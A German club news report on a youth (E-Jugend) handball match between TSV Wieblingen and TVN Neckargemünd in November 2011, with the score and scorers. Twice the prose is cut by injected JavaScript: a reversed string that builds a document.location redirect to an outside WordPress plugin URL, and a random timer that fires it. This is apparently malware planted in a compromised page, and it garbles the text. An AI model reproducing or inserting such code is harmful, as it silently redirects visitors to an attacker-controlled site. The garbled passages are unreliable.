E-Jugend: Niederlage trotz guter Leistung

Wieblingen, 27.11.2011 (spa) – Am letzten November-Wochenende stand für die E-Jugend des TVN das Auswärtsspiel beim TSV Wieblingen auf dem Programm. Nach dem letzten Heimspiel, welches gegen den körperlich übermächtigen Gegner aus Bammental deutlich verloren ging, wollten die Jungs und Mädels endlich wieder einen Erfolg feiern.

Obwohl kein Auswärtssieg gelang, war der Spielverlauf sehr ausgeglichen. Sogar ein Neckargemünder Sieg wäre möglich gewesen, hätte letztendlich nicht die zahlenmäßige Übermacht des Gastgebers (16 SpielerInnen und 10 Torschützen) den Unterschied ausgemacht. Der TVN begann stark und ging schon früh souverän in Führung, die er bis kurz vor der Halbzeit auch hielt. In diesem Spielabschnitt zeigten die Jungen und Mädchen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tollen Tempohandball – mit vielen sicheren Pässen und schnellen Spielkombinationen.

Nach der Halbzeit spielte der Gastgeber etwas sicherer und stabiler in der Abwehr, so häuften sich beim TVN die Ballverluste. Trainerin Sylvia Trunzer blieb cool und gab allen Spielern – auch den jüngeren – die Chance, ihr Können zu zeigen. So hatte auch fast jeder Spieler der Mannschaft mindestens ein Tor zu verbuchen. Auf diese Weise schaffte der TVN es bis zum Schluss, das Ergebnis knapp zu gestalten.

Endergebnis nach Multiplikatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor: 190 : 153

Für Neckargemünd spielten: Schaum, Johannes (5) – Gölz, Ronja (3) – Paulus, Mika (2) – Wagner, Jana (2) – Göppert, Leon (1) – Harant, Lars (1) – Hermann, Wanja (1) – Kinzig, Danny (1) – Schmoll, Collin (1) – Geißler, Valentin